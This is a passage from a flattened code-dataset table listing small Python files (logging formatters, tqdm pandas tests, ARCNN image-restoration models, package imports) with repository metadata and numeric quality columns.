# preds = preds[:, 1]
#
# if self.metamodel_calibrators:
# out = self.metamodel_calibrators[mm].predict(preds)
# confidences.append(out)
# else:
# confidences.append(preds)
#
# preds = confidences
# confidences = np.mean(preds, axis=1)
#
# if self.calibrator is not None:
# confidences = self.calibrator.predict(confidences)
#
# output = {'confidences': confidences, 'uncertainties': np.zeros(confidences.shape)}
# return output
#
# def save(self, output_location):
# pass
#
# def load(self, input_location):
# pass
| 38.350701
| 160
| 0.567174
| 2,158
| 19,137
| 4.86608
| 0.139481
| 0.03733
| 0.036568
| 0.029711
| 0.870108
| 0.856871
| 0.854776
| 0.854776
| 0.854776
| 0.854776
| 0
| 0.030814
| 0.336939
| 19,137
| 498
| 161
| 38.427711
| 0.796753
| 0.538172
| 0
| 0.255682
| 0
| 0
| 0.11791
| 0
| 0
| 0
| 0
| 0
| 0.005682
| 1
| 0.034091
| false
| 0.011364
| 0.068182
| 0.005682
| 0.153409
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
62d2b230640f3a1dfc2a65dba72fff893c6bf771
| 35
|
py
|
Python
|
UPGL/windows/__init__.py
|
DillonEnge/UPGL
|
a4ed766b689d1a231f4ef51169beebb4f11adfd7
|
[
"MIT"
] | null | null | null |
UPGL/windows/__init__.py
|
DillonEnge/UPGL
|
a4ed766b689d1a231f4ef51169beebb4f11adfd7
|
[
"MIT"
] | null | null | null |
UPGL/windows/__init__.py
|
DillonEnge/UPGL
|
a4ed766b689d1a231f4ef51169beebb4f11adfd7
|
[
"MIT"
] | null | null | null |
from .example import ExampleWindow
| 17.5
| 34
| 0.857143
| 4
| 35
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a7df1fa818ec8e601e14f01067e39937e97b1aec
| 95
|
py
|
Python
|
happy_config/param_tuning/__init__.py
|
GraphCL/happy_config
|
2e1accb6161b9e8ee2a7fd9359b9155e915a075b
|
[
"MIT"
] | 1
|
2022-03-07T13:56:27.000Z
|
2022-03-07T13:56:27.000Z
|
happy_config/param_tuning/__init__.py
|
GraphCL/happy_config
|
2e1accb6161b9e8ee2a7fd9359b9155e915a075b
|
[
"MIT"
] | null | null | null |
happy_config/param_tuning/__init__.py
|
GraphCL/happy_config
|
2e1accb6161b9e8ee2a7fd9359b9155e915a075b
|
[
"MIT"
] | null | null | null |
from .search_space import SearchSpace, ParameterSpace, extract_search_space, with_search_space
| 47.5
| 94
| 0.884211
| 12
| 95
| 6.583333
| 0.666667
| 0.417722
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073684
| 95
| 1
| 95
| 95
| 0.897727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a7edda09d386e406741daeb3758f0a06937c3d6b
| 756
|
py
|
Python
|
shabanipy/logging/formatters.py
|
ShabaniLab/DataAnalysis
|
e234b7d0e4ff8ecc11e58134e6309a095abcd2c0
|
[
"MIT"
] | 6
|
2019-06-25T20:01:03.000Z
|
2022-03-25T23:15:57.000Z
|
shabanipy/logging/formatters.py
|
ShabaniLab/DataAnalysis
|
e234b7d0e4ff8ecc11e58134e6309a095abcd2c0
|
[
"MIT"
] | null | null | null |
shabanipy/logging/formatters.py
|
ShabaniLab/DataAnalysis
|
e234b7d0e4ff8ecc11e58134e6309a095abcd2c0
|
[
"MIT"
] | 5
|
2019-06-11T17:21:54.000Z
|
2021-08-24T14:45:08.000Z
|
"""Logging formatters."""
from logging import INFO, Formatter
class InformativeFormatter(Formatter):
def format(self, record):
return (
f"[{record.levelname}]".ljust(11)
+ f"{record.filename}:{record.lineno}".ljust(25)
+ " "
+ record.getMessage()
+ (f"\n{self.formatException(record.exc_info)}" if record.exc_info else "")
)
class ConsoleFormatter(Formatter):
def format(self, record):
return (
f"[{record.levelname}]".ljust(11)
+ (f"{record.filename}:{record.lineno} " if record.levelno > INFO else "")
+ record.getMessage()
+ (f"\n{self.formatException(record.exc_info)}" if record.exc_info else "")
)
| 31.5
| 87
| 0.572751
| 78
| 756
| 5.5
| 0.358974
| 0.065268
| 0.121212
| 0.102564
| 0.713287
| 0.713287
| 0.713287
| 0.713287
| 0.713287
| 0.713287
| 0
| 0.010929
| 0.27381
| 756
| 23
| 88
| 32.869565
| 0.770492
| 0.025132
| 0
| 0.555556
| 0
| 0
| 0.259918
| 0.202462
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.055556
| 0.111111
| 0.388889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
a7f9061822a84869d4b69d85b59f7876bc1f30bb
| 22
|
py
|
Python
|
read/read/str/readers/db.py
|
vitalfadeev/read
|
f8893daa732d50bb6f1da94e66d016d5611f1983
|
[
"MIT"
] | null | null | null |
read/read/str/readers/db.py
|
vitalfadeev/read
|
f8893daa732d50bb6f1da94e66d016d5611f1983
|
[
"MIT"
] | 2
|
2021-11-25T12:37:48.000Z
|
2021-11-25T12:38:33.000Z
|
read/read/str/readers/db.py
|
vitalfadeev/read
|
f8893daa732d50bb6f1da94e66d016d5611f1983
|
[
"MIT"
] | null | null | null |
from .sqlite3 import *
| 22
| 22
| 0.772727
| 3
| 22
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 0.136364
| 22
| 1
| 22
| 22
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c51aad8f535c36df24d27afde02bee1ac3f489a9
| 32
|
py
|
Python
|
autoscalingsim/deltarepr/node_group_delta/__init__.py
|
Remit/autoscaling-simulator
|
091943c0e9eedf9543e9305682a067ab60f56def
|
[
"MIT"
] | 6
|
2021-03-10T16:23:10.000Z
|
2022-01-14T04:57:46.000Z
|
autoscalingsim/deltarepr/node_group_delta/__init__.py
|
Remit/autoscaling-simulator
|
091943c0e9eedf9543e9305682a067ab60f56def
|
[
"MIT"
] | null | null | null |
autoscalingsim/deltarepr/node_group_delta/__init__.py
|
Remit/autoscaling-simulator
|
091943c0e9eedf9543e9305682a067ab60f56def
|
[
"MIT"
] | 1
|
2022-01-14T04:57:55.000Z
|
2022-01-14T04:57:55.000Z
|
from .node_group_delta import *
| 16
| 31
| 0.8125
| 5
| 32
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 32
| 1
| 32
| 32
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c560cc8fcd7966f3b469fcf6485f99a87d5623ca
| 135
|
py
|
Python
|
moban/plugins/jinja2/tests/win32.py
|
allegheny-college-cmpsc-481-spring-2020/moban
|
632622d2506606f06aaaf7882523444998d9bd8f
|
[
"MIT"
] | 1
|
2020-09-04T23:52:55.000Z
|
2020-09-04T23:52:55.000Z
|
moban/plugins/jinja2/tests/win32.py
|
allegheny-college-cmpsc-481-spring-2020/moban
|
632622d2506606f06aaaf7882523444998d9bd8f
|
[
"MIT"
] | 1
|
2020-09-04T23:42:19.000Z
|
2020-09-04T23:42:23.000Z
|
moban/plugins/jinja2/tests/win32.py
|
allegheny-college-cmpsc-481-spring-2020/moban
|
632622d2506606f06aaaf7882523444998d9bd8f
|
[
"MIT"
] | 1
|
2020-09-24T08:34:00.000Z
|
2020-09-24T08:34:00.000Z
|
from os.path import normcase, normpath
def samefile(file1, file2):
return normcase(normpath(file1)) == normcase(normpath(file2))
| 22.5
| 65
| 0.748148
| 17
| 135
| 5.941176
| 0.647059
| 0.475248
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034188
| 0.133333
| 135
| 5
| 66
| 27
| 0.82906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
|
0
| 6
|
c569a493de22568e81d46ce6cb27237078079152
| 89
|
py
|
Python
|
3_mfr/some_more.py
|
konflic/python_qa_functional_programming
|
70109dc1a2d9bc775ab6c67b49244454281fa1b4
|
[
"MIT"
] | null | null | null |
3_mfr/some_more.py
|
konflic/python_qa_functional_programming
|
70109dc1a2d9bc775ab6c67b49244454281fa1b4
|
[
"MIT"
] | null | null | null |
3_mfr/some_more.py
|
konflic/python_qa_functional_programming
|
70109dc1a2d9bc775ab6c67b49244454281fa1b4
|
[
"MIT"
] | 2
|
2021-01-24T18:14:48.000Z
|
2021-01-25T16:50:21.000Z
|
print(any([True, 1, ""]))
print(all([True, 1, ""]))
print(dict(zip([1, 2, 3], "abc")))
| 14.833333
| 34
| 0.494382
| 15
| 89
| 2.933333
| 0.666667
| 0.227273
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064935
| 0.134831
| 89
| 5
| 35
| 17.8
| 0.506494
| 0
| 0
| 0
| 0
| 0
| 0.033708
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
c571e9c03ef914e8ea6f2f513d16e384d8d9f63d
| 36
|
py
|
Python
|
centrySDK/__init__.py
|
YerkoCuzmar/CentrySDK
|
e32080552e71c40119e4dc8cbaa520f0bf9254e3
|
[
"MIT"
] | null | null | null |
centrySDK/__init__.py
|
YerkoCuzmar/CentrySDK
|
e32080552e71c40119e4dc8cbaa520f0bf9254e3
|
[
"MIT"
] | null | null | null |
centrySDK/__init__.py
|
YerkoCuzmar/CentrySDK
|
e32080552e71c40119e4dc8cbaa520f0bf9254e3
|
[
"MIT"
] | null | null | null |
from centrySDK.centry import Centry
| 18
| 35
| 0.861111
| 5
| 36
| 6.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.96875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3d7d515c77cf07d3d4851ce261657efca4481102
| 2,814
|
py
|
Python
|
PicNumero/tqdm/tests/tests_pandas.py
|
kmiddleton/Pic-Numero
|
69a295d208106c486854473521e8d1fef13a0a24
|
[
"MIT"
] | null | null | null |
PicNumero/tqdm/tests/tests_pandas.py
|
kmiddleton/Pic-Numero
|
69a295d208106c486854473521e8d1fef13a0a24
|
[
"MIT"
] | null | null | null |
PicNumero/tqdm/tests/tests_pandas.py
|
kmiddleton/Pic-Numero
|
69a295d208106c486854473521e8d1fef13a0a24
|
[
"MIT"
] | null | null | null |
from nose.plugins.skip import SkipTest
from tqdm import tqdm
from tests_tqdm import with_setup, pretest, posttest, StringIO, closing
@with_setup(pretest, posttest)
def test_pandas_groupby_apply():
""" Test pandas.DataFrame.groupby(...).progress_apply """
try:
from numpy.random import randint
from tqdm import tqdm_pandas
import pandas as pd
except:
raise SkipTest
with closing(StringIO()) as our_file:
df = pd.DataFrame(randint(0, 50, (500, 3)))
dfs = pd.DataFrame(randint(0, 50, (500, 3)),
columns=list('abc'))
tqdm_pandas(tqdm(file=our_file, leave=False, ascii=True))
df.groupby(0).progress_apply(lambda x: None)
tqdm_pandas(tqdm(file=our_file, leave=False, ascii=True))
dfs.groupby(['a']).progress_apply(lambda x: None)
our_file.seek(0)
# don't expect final output since no `leave` and
# high dynamic `miniters`
nexres = '100%|##########|'
if nexres in our_file.read():
our_file.seek(0)
raise AssertionError("\nDid not expect:\n{0}\nIn:{1}\n".format(
nexres, our_file.read()))
@with_setup(pretest, posttest)
def test_pandas_apply():
""" Test pandas.DataFrame[.series].progress_apply """
try:
from numpy.random import randint
from tqdm import tqdm_pandas
import pandas as pd
except:
raise SkipTest
with closing(StringIO()) as our_file:
df = pd.DataFrame(randint(0, 50, (500, 3)))
dfs = pd.DataFrame(randint(0, 50, (500, 3)),
columns=list('abc'))
tqdm_pandas(tqdm(file=our_file, leave=True, ascii=True))
df.progress_apply(lambda x: None)
tqdm_pandas(tqdm(file=our_file, leave=True, ascii=True))
dfs.a.progress_apply(lambda x: None)
our_file.seek(0)
if our_file.read().count('100%') < 2:
our_file.seek(0)
raise AssertionError("\nExpected:\n{0}\nIn:{1}\n".format(
'100% at least twice', our_file.read()))
@with_setup(pretest, posttest)
def test_pandas_leave():
""" Test pandas with `leave=True` """
try:
from numpy.random import randint
from tqdm import tqdm_pandas
import pandas as pd
except:
raise SkipTest
with closing(StringIO()) as our_file:
df = pd.DataFrame(randint(0, 100, (1000, 6)))
tqdm_pandas(tqdm(file=our_file, leave=True, ascii=True))
df.groupby(0).progress_apply(lambda x: None)
our_file.seek(0)
exres = '100%|##########| 101/101'
if exres not in our_file.read():
our_file.seek(0)
raise AssertionError("\nExpected:\n{0}\nIn:{1}\n".format(
exres, our_file.read()))
| 32.72093
| 75
| 0.599147
| 373
| 2,814
| 4.394102
| 0.22252
| 0.085418
| 0.040268
| 0.043929
| 0.75961
| 0.75961
| 0.751678
| 0.729103
| 0.729103
| 0.721782
| 0
| 0.033981
| 0.267946
| 2,814
| 85
| 76
| 33.105882
| 0.76165
| 0.071073
| 0
| 0.703125
| 0
| 0
| 0.059368
| 0.028527
| 0
| 0
| 0
| 0
| 0.046875
| 1
| 0.046875
| false
| 0
| 0.1875
| 0
| 0.234375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3d7df5f54664de3b6ddaca1a454fb0fb068dab5a
| 1,635
|
py
|
Python
|
src/nets/arcnn.py
|
VDIGPKU/QGCN
|
657afb8977721f65ef2bae7c2333a93a3315dab1
|
[
"MIT"
] | 21
|
2020-12-05T14:14:07.000Z
|
2022-03-04T17:35:36.000Z
|
src/nets/arcnn.py
|
VDIGPKU/QGCN
|
657afb8977721f65ef2bae7c2333a93a3315dab1
|
[
"MIT"
] | 2
|
2020-11-02T11:55:36.000Z
|
2021-01-29T04:50:10.000Z
|
src/nets/arcnn.py
|
VDIGPKU/QGCN
|
657afb8977721f65ef2bae7c2333a93a3315dab1
|
[
"MIT"
] | 7
|
2021-02-21T05:11:38.000Z
|
2022-03-20T01:07:03.000Z
|
from torch import nn
class ARCNN(nn.Module):
def __init__(self, n_colors=3):
super(ARCNN, self).__init__()
self.base = nn.Sequential(
nn.Conv2d(n_colors, 64, kernel_size=9, padding=4),
nn.PReLU(),
nn.Conv2d(64, 32, kernel_size=7, padding=3),
nn.PReLU(),
nn.Conv2d(32, 16, kernel_size=1),
nn.PReLU()
)
self.last = nn.Conv2d(16, n_colors, kernel_size=5, padding=2)
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.normal_(m.weight, std=0.001)
def forward(self, x):
x = self.base(x)
x = self.last(x)
return x
class FastARCNN(nn.Module):
def __init__(self, n_colors=3):
super(FastARCNN, self).__init__()
self.base = nn.Sequential(
nn.Conv2d(n_colors, 64, kernel_size=9, stride=2, padding=4),
nn.PReLU(),
nn.Conv2d(64, 32, kernel_size=1),
nn.PReLU(),
nn.Conv2d(32, 32, kernel_size=7, padding=3),
nn.PReLU(),
nn.Conv2d(32, 64, kernel_size=1),
nn.PReLU()
)
self.last = nn.ConvTranspose2d(64, n_colors, kernel_size=9, stride=2, padding=4, output_padding=1)
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.normal_(m.weight, std=0.001)
def forward(self, x):
x = self.base(x)
x = self.last(x)
return x
| 29.727273
| 106
| 0.548012
| 222
| 1,635
| 3.846847
| 0.22973
| 0.093677
| 0.052693
| 0.087822
| 0.846604
| 0.825527
| 0.825527
| 0.786885
| 0.721311
| 0.64637
| 0
| 0.06009
| 0.318043
| 1,635
| 54
| 107
| 30.277778
| 0.70583
| 0
| 0
| 0.644444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.022222
| 0
| 0.244444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.